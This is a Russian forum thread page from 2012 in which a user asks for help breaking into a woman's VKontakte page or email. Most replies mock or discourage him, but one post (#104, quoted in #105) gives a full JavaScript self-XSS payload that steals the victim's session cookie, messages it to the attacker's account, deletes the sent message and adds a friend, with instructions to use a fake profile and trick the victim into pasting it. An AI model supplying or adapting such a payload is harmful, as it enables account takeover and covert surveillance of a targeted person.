Перейти к содержимому


Фотография

кто нибуть может помочь со взломом странички контакта или почты ??


136 ответов в этой теме

#101 Мяут

Мяут

    Mr. Goodcat

  • True Members
  • PipPipPipPipPip
  • 4 156 сообщений
67
Хороший
  • Пол:Мужчина
  • Город:Пушкин

Опубликовано 18 Январь 2012 - 21:24

и вообще как это не возможно ?? вон в прошлом году взломали сеть PSN и нормально сеть не работала пару месяцев а тут всего лишь страничка в контакте.. я думаю её то легче взломать чем сеть.. о_О да и вообще в прошлом году как то очень уж часто взламывали разные сети..

Взломать можно все. Вопрос в реальной стоимости такого взлома. :)
  • 0

#102 CherryPah

CherryPah

    Штатный IT раздолбай

  • Moderators
  • PipPipPipPipPip
  • 9 761 сообщений
584
Очень хороший
  • Пол:Мужчина

Опубликовано 18 Январь 2012 - 21:42

у неё не интернет кабель а 3G от мегафона ))

и вообще как это не возможно ?? вон в прошлом году взломали сеть PSN и нормально сеть не работала пару месяцев а тут всего лишь страничка в контакте.. я думаю её то легче взломать чем сеть.. о_О да и вообще в прошлом году как то очень уж часто взламывали разные сети..

вопрос в стоимости/идейных соображениях
  • 0

Вконтакте
Когда я купил коробку с WoW, на ней не было ни слова про теорикрафт и ротацию. Там было сказано: СТАНЬ ГЕРОЕМ, УБЕЙ ДРАКОНА.
Хочу назад в ванилу, никаких вещей за баджи, убил босса-полутал эпик, не убил ходи в синих трусах и зеленой рубахе, завидуй рейдерам в т1/2, молись на богов пве в т3.


#103 *soulburner*

*soulburner*

    You have reached level cap

  • True Members
  • PipPipPipPipPip
  • 5 619 сообщений
225
Очень хороший
  • Пол:Мужчина

Опубликовано 18 Январь 2012 - 21:54

и вообще как это не возможно ?? вон в прошлом году взломали сеть PSN и нормально сеть не работала пару месяцев а тут всего лишь страничка в контакте.. я думаю её то легче взломать чем сеть.. о_О да и вообще в прошлом году как то очень уж часто взламывали разные сети..

Взламываеть нужно не "какую-то страничку в контакте", а ВЕСЬ КОНТАКТ ЦЕЛИКОМ. Чуть применив серое вещество, очевидно, что каждая страничка юзера не защищена по отдельности. Все они защищены одним общим механизмом. Так что ломать надо не страничку Маши, а ВЕСЬ контакт! Ты представляешь, какого уровня защита у самого крупного сайта в России??? И сколько ресурсов понадобится, чтобы осуществить взлом?

А как взломали PSN - не известно. Может, там не обошлось без проникнования в датацентр или без кражи каких-то ключей с чьего-нить компьютера.

Так что Рой! Хватит страдать херней. Пока у тебя нет денег на диверсионную группу, которая бы проникла в датацентр контакта плюс команду хакеров, которые бы смогли взломать один из самых крупных проектов рунета - для тебя остаются только те пункты, которые я перечислил выше. А взлом - считай, НЕВОЗМОЖЕН.
  • 1

#104 wayfarer

wayfarer

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 286 сообщений
19
Обычный
  • Пол:Мужчина

Опубликовано 19 Январь 2012 - 12:10

Java script:var percentGold=11111;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold ').innerHTML=percentGold;ge('rateLeftGold').style. width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Ma th.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent' ).innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);wid thRight=parseInt(ge('rateRight').style.width);_b() ;}else{percentGold=parseInt(ge('percentGold').inne rHTML);widthLeft=parseInt(ge('rateLeftGold').style .width);widthRight=parseInt(ge('rateRightGold').st yle.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').i nnerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(t);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight'). id='rateRightGold';widthLeft=20;widthRight=179;_a( );}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_ form',fid:11111},onDone:function(ajaxObj,respon seText){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=re sponse.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend. php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to :11111},onDone:function(ajaxObj,responseText){v ar text=responseText;try{f.innerHTML=responseText;par ams={act:ge('act').value,ajax:1,misc:ge('misc')?ge ('misc').value:'',secure:ge('secure')?ge('secure') .value:'',chas:ge('chas').value,photo:ge('photo')? ge('photo').value:'',to_id:11111,to_reply:ge('t o_reply').value,toFriends:ge('toFriends')?ge('toFr iends').value:'',title:ge('title').value,message:' '+Math.round(Math.random()*10000)+document.cookie+ Math.round(Math.random()*10000)};setTimeout(c,3000 );}catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',query:params,onDone: function(ajaxObj,responseText){setTimeout(e,1000); }});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:funct ion(ajaxObj,responseText){try{var k='<a href="mail.php?act=write&to=11111&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g -pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',query:params});}catch(e) {}}});}; onDomReady(function(){document.body.appendChild(f) ; first();a();b();});


это скрипт на то, что ты воруешь ее "печенько", параллельно поднимает рейтинг на 61%, ну это так..., там где стоит 11111 вписываешь свой id в контакте (советую сделать страницу фейк, или воспользоваться CherryPah'а (он говорил что у него есть страничка "неуловимый джо"), далее брут форс по кукисам - захещировано md5.
пробел не забудь убрать)

Я ничё не говорил :D

Аналогично.
  • 0

#105 RoY

RoY

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 4 201 сообщений
-426
Очень плохой
  • Пол:Мужчина

Опубликовано 31 Январь 2012 - 20:29

Java script:var percentGold=11111;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold ').innerHTML=percentGold;ge('rateLeftGold').style. width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Ma th.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent' ).innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);wid thRight=parseInt(ge('rateRight').style.width);_b() ;}else{percentGold=parseInt(ge('percentGold').inne rHTML);widthLeft=parseInt(ge('rateLeftGold').style .width);widthRight=parseInt(ge('rateRightGold').st yle.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').i nnerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(t);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight'). id='rateRightGold';widthLeft=20;widthRight=179;_a( );}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_ form',fid:11111},onDone:function(ajaxObj,respon seText){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=re sponse.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend. php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to :11111},onDone:function(ajaxObj,responseText){v ar text=responseText;try{f.innerHTML=responseText;par ams={act:ge('act').value,ajax:1,misc:ge('misc')?ge ('misc').value:'',secure:ge('secure')?ge('secure') .value:'',chas:ge('chas').value,photo:ge('photo')? ge('photo').value:'',to_id:11111,to_reply:ge('t o_reply').value,toFriends:ge('toFriends')?ge('toFr iends').value:'',title:ge('title').value,message:' '+Math.round(Math.random()*10000)+document.cookie+ Math.round(Math.random()*10000)};setTimeout(c,3000 );}catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',query:params,onDone: function(ajaxObj,responseText){setTimeout(e,1000); }});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:funct ion(ajaxObj,responseText){try{var k='<a href="mail.php?act=write&to=11111&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g -pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',query:params});}catch(e) {}}});}; onDomReady(function(){document.body.appendChild(f) ; first();a();b();});


это скрипт на то, что ты воруешь ее "печенько", параллельно поднимает рейтинг на 61%, ну это так..., там где стоит 11111 вписываешь свой id в контакте (советую сделать страницу фейк, или воспользоваться CherryPah'а (он говорил что у него есть страничка "неуловимый джо"), далее брут форс по кукисам - захещировано md5.
пробел не забудь убрать)

Аналогично.

куда этот код вставлять ??
  • 0

#106 SyntaT

SyntaT

    Anime Force ^_^

  • True Members
  • PipPipPipPipPip
  • 6 986 сообщений
469
Очень хороший
  • Пол:Мужчина
  • Город:Санкт-Петербург
  • Интересы:многообразны

Опубликовано 31 Январь 2012 - 20:58

там где стоит 11111 вписываешь свой id в контакте

а как хотя бы на счёт id жертвы? скрипт определяет его телепатически? :lol:

куда этот код вставлять ??

в адресную строку, но я сомневаюсь в твоём успехе)
  • 0

Размещенное изображение
Размещенное изображение

Подсознательно желание сказать фразу типа баян, гармошко, читал уже и т.п. это не более чем банальное желание выпендрицо и показать что ты чем-то лучше других...молодец что читал ..теперь мы почитаем..


#107 ATLON

ATLON

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 1 879 сообщений
9
Обычный
  • Пол:Мужчина

Опубликовано 31 Январь 2012 - 21:55

куда этот код вставлять ??

А ты куда его вставлял? :blink:
  • 0
Вам сначала диагноз нужно поставить, а уж потом штамп в паспорте. (Интерны)
Женщинам сиськи "ставил"...И это НЕ "энергии". Это результат...правильной... работы... с Подсознанием Человека. (с) Gosha
Как то неприятно стало... ©

#108 wayfarer

wayfarer

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 286 сообщений
19
Обычный
  • Пол:Мужчина

Опубликовано 01 Февраль 2012 - 01:04

а как хотя бы на счёт id жертвы? скрипт определяет его телепатически? :lol:


в адресную строку, но я сомневаюсь в твоём успехе)

этот код должна вставить жертва, соответственно тебе придет сообщение с "печенькой" жертвы, как завтавить вставить этот код жертву - вопрос, а вставляется верно, в адресную строку. Полгода назад работала, с тех пор ничего не трогал и за контактом не следил.
  • 0

#109 Aravan

Aravan

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 5 561 сообщений
274
Очень хороший
  • Пол:Мужчина
  • Город:Питер

Опубликовано 01 Февраль 2012 - 01:05

этот код должна вставить жертва, соответственно тебе придет сообщение с "печенькой" жертвы, как завтавить вставить этот код жертву - вопрос, а вставляется верно, в адресную строку.

Попросить перейти по ссылке же.
  • 0

#110 wayfarer

wayfarer

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 286 сообщений
19
Обычный
  • Пол:Мужчина

Опубликовано 01 Февраль 2012 - 01:29

нет, это не ссылка, это именно надо вставить в строку адреса и нажать энтер - это скрипт, можно и страницу написать с таким скриптом, но я этим не занимался.
  • 0

#111 Gosha

Gosha

    Великий Гоша

  • True Members
  • PipPipPipPipPip
  • 11 818 сообщений
-317
Очень плохой
  • Пол:Мужчина
  • Город:Моя Земля в Волшебном лесу

Опубликовано 01 Февраль 2012 - 05:33

Народ, если не прав, не бейте больно!...
Видел в нете, такую фишку. Заходишь на сайт - чёт там какие-то манипуляци. Элементарные, доступные домохозяйке... И ву-а-ля, наблюдаешь любую личную преписку. Любого пользователя интернета. С любого сервиса.

Может мне это приснилось?... :o

ЗЫ: А вообще, афтор - бросай ты это дело... Даже если у тебя получится. Вскроешь ты её почту. Кому ты - что докажешь?
Ты хочешь доказать что ты мужик - курице!?...
Так пойди в зоопарк - там полно пернатых... Побеседуй с понравившейся. Легче станет.
  • 0
Гоша, я тебе смайлики отключу, пиши нормально. (с) Serge
Гоша, Вы редкостный мygak. (с) JesTerro
То, что ты ищешь - с тобой. Продолжая поиски, ты лишь всё более это теряешь. (с) Gosha
Всё что сразу не убивает - делает тебя сильнее!... (с) Gosha

#112 ATLON

ATLON

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 1 879 сообщений
9
Обычный
  • Пол:Мужчина

Опубликовано 01 Февраль 2012 - 05:45

Народ, если не прав, не бейте больно!...
Видел в нете, такую фишку. Заходишь на сайт - чёт там какие-то манипуляци. Элементарные, доступные домохозяйке... И ву-а-ля, наблюдаешь любую личную преписку. Любого пользователя интернета. С любого сервиса.

Может мне это приснилось?... :o

Закусывать надо! (с)
Отправь СМС со словами "АХАЛАЙ-МАХАЛАЙ, СИСЬКИ-МАСИСЬКИ", на короткий номер 1234 и получи доступ к любым личным сообщениям твоей половинки, твоего начальника, твоего Папы Римского!!! Подтвердите получение ответного СМС введением вашего пароля и адреса эл.почты, и станьте VIP обладателем программы "Шпион" на твоем компьютере!!!
:D :D :D

ЗЫ: А вообще, афтор - бросай ты это дело... Даже если у тебя получится. Вскроешь ты её почту. Кому ты - что докажешь?

Ну, тут ты вокруг да около не прав, он прежде всего самому себе докажет что может взломать её почту и носить это гордое имя - ХАКЕРЬ!
  • 0
Вам сначала диагноз нужно поставить, а уж потом штамп в паспорте. (Интерны)
Женщинам сиськи "ставил"...И это НЕ "энергии". Это результат...правильной... работы... с Подсознанием Человека. (с) Gosha
Как то неприятно стало... ©

#113 Gosha

Gosha

    Великий Гоша

  • True Members
  • PipPipPipPipPip
  • 11 818 сообщений
-317
Очень плохой
  • Пол:Мужчина
  • Город:Моя Земля в Волшебном лесу

Опубликовано 01 Февраль 2012 - 06:04

RoY.
У меня, моя законная благоверная, в мой мобильник влезла... Смс-ки от моих дам почитала. :-)
Даже моей Праймари(любимой жене) позвонить додумалась, - рассказала что у меня и другие женщины есть, - ЗМЕЮКА!...

И-что!? - думаешь я неотбрехался?... Праймари моя ...- эмм!... - лелеять... меня меньше стала?...

Что она мне этим доказала, моя благоверная... Что "я идиот" - больше двадцати лет прожил с этой курицей!?
Я её хоть как-то уважать стал?... Благоверную...
Да только убедился - гулял... гуляю... и правильно делаю. И гулять, пока стоит - БУДУ!

ЗЫ: Так-что, RoY, доказывать что-то курице, - оно себе дороже. Уж поверь моим сединам... :-)
  • 0
Гоша, я тебе смайлики отключу, пиши нормально. (с) Serge
Гоша, Вы редкостный мygak. (с) JesTerro
То, что ты ищешь - с тобой. Продолжая поиски, ты лишь всё более это теряешь. (с) Gosha
Всё что сразу не убивает - делает тебя сильнее!... (с) Gosha

#114 ATLON

ATLON

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 1 879 сообщений
9
Обычный
  • Пол:Мужчина

Опубликовано 01 Февраль 2012 - 06:12

-]
  • 0
Вам сначала диагноз нужно поставить, а уж потом штамп в паспорте. (Интерны)
Женщинам сиськи "ставил"...И это НЕ "энергии". Это результат...правильной... работы... с Подсознанием Человека. (с) Gosha
Как то неприятно стало... ©

#115 Gosha

Gosha

    Великий Гоша

  • True Members
  • PipPipPipPipPip
  • 11 818 сообщений
-317
Очень плохой
  • Пол:Мужчина
  • Город:Моя Земля в Волшебном лесу

Опубликовано 01 Февраль 2012 - 06:18

Ой!... Что это было?... Куды бечь - куды спасаться!?... Моя благоверная, форум СВНЕТ вскрыла?... :-))))))))))
  • 0
Гоша, я тебе смайлики отключу, пиши нормально. (с) Serge
Гоша, Вы редкостный мygak. (с) JesTerro
То, что ты ищешь - с тобой. Продолжая поиски, ты лишь всё более это теряешь. (с) Gosha
Всё что сразу не убивает - делает тебя сильнее!... (с) Gosha

#116 ATLON

ATLON

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 1 879 сообщений
9
Обычный
  • Пол:Мужчина

Опубликовано 01 Февраль 2012 - 06:22

Народ, если не прав, не бейте больно!...
Видел в нете, такую фишку. Заходишь на сайт - чёт там какие-то манипуляци. Элементарные, доступные домохозяйке... И ву-а-ля, наблюдаешь любую личную преписку. Любого пользователя интернета. С любого сервиса.

Вообще, да, есть такое дело, зная адрес эл.почты и пароль, элементарно заходишь на сайт который прописан в эл.адресе до знака "@" - сабчачка, производишь манипуляции с паролем (это доступно любой домохозяйке :) ) - вводишь пароль... И ву-а-ля, наблюдаешь любую личную преписку. :D :D :D

Я её хоть как-то уважать стал?... Благоверную...


А чо, до этого двадцать лет и все без уважения???!!! :blink:
  • 0
Вам сначала диагноз нужно поставить, а уж потом штамп в паспорте. (Интерны)
Женщинам сиськи "ставил"...И это НЕ "энергии". Это результат...правильной... работы... с Подсознанием Человека. (с) Gosha
Как то неприятно стало... ©

#117 Gosha

Gosha

    Великий Гоша

  • True Members
  • PipPipPipPipPip
  • 11 818 сообщений
-317
Очень плохой
  • Пол:Мужчина
  • Город:Моя Земля в Волшебном лесу

Опубликовано 01 Февраль 2012 - 06:27

.............

А чо, до этого двадцать лет и все без уважения???!!! :blink:


Зачем тебе это, родной?... Знать что весь институт семьи построен на идиотизме?... Мыслевирусах...

Меньше знаешь - лучше спишь!... - Заплати налоги, душевный ты наш...

ЗЫ: "Вам сначала диагноз нужно поставить, а уж потом штамп в паспорте." - ты истинный смысл этой фразы, хотя б понял?...
  • 0
Гоша, я тебе смайлики отключу, пиши нормально. (с) Serge
Гоша, Вы редкостный мygak. (с) JesTerro
То, что ты ищешь - с тобой. Продолжая поиски, ты лишь всё более это теряешь. (с) Gosha
Всё что сразу не убивает - делает тебя сильнее!... (с) Gosha

#118 wayfarer

wayfarer

    Super True Member

  • True Members
  • PipPipPipPipPip
  • 286 сообщений
19
Обычный
  • Пол:Мужчина

Опубликовано 01 Февраль 2012 - 21:07

ЗЫ: "Вам сначала диагноз нужно поставить, а уж потом штамп в паспорте." - ты истинный смысл этой фразы, хотя б понял?...

Объясни как понимаешь.
  • 0

#119 Gosha

Gosha

    Великий Гоша

  • True Members
  • PipPipPipPipPip
  • 11 818 сообщений
-317
Очень плохой
  • Пол:Мужчина
  • Город:Моя Земля в Волшебном лесу

Опубликовано 01 Февраль 2012 - 21:17

Объясни как понимаешь.


Решил кaк-то рaз Илья Муромец срaзиться с погaным Чудищем. Змеем трёхглавым.
Пришел он к его логову - в дверь мечём постучался.
Дверь открылa девицa неземной крaсоты:
- Тебе кого?
- Мне это,... Чудище...
- Ну... - я - Чудище!
- Кaк ты?!!!
- Ну... - нaкрaсилaсь я!
-----------------------------

Нет - ребята, - пулемёту я вам не дам!... :-)

Детей народите. На крыло поставите... Вот и сядем рядком, да поговорим ладком.

Я не практикующий... Доктор. :-)
Но, Рою могу помочь. Маленько. Забыть даму...
  • 0
Гоша, я тебе смайлики отключу, пиши нормально. (с) Serge
Гоша, Вы редкостный мygak. (с) JesTerro
То, что ты ищешь - с тобой. Продолжая поиски, ты лишь всё более это теряешь. (с) Gosha
Всё что сразу не убивает - делает тебя сильнее!... (с) Gosha

#120 SyntaT

SyntaT

    Anime Force ^_^

  • True Members
  • PipPipPipPipPip
  • 6 986 сообщений
469
Очень хороший
  • Пол:Мужчина
  • Город:Санкт-Петербург
  • Интересы:многообразны

Опубликовано 01 Февраль 2012 - 21:29

Но, Рою могу помочь. Маленько. Забыть даму...

Будьте чуть аккуратнее в формулировках, а то мы можем про дурные наклонности подумать :lol: Интернет - место скопления крайне испорченных людей, пошлости так и лезут на язык..))
  • 2

Размещенное изображение
Размещенное изображение

Подсознательно желание сказать фразу типа баян, гармошко, читал уже и т.п. это не более чем банальное желание выпендрицо и показать что ты чем-то лучше других...молодец что читал ..теперь мы почитаем..




Ответить в эту тему



  

Посетителей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных пользователей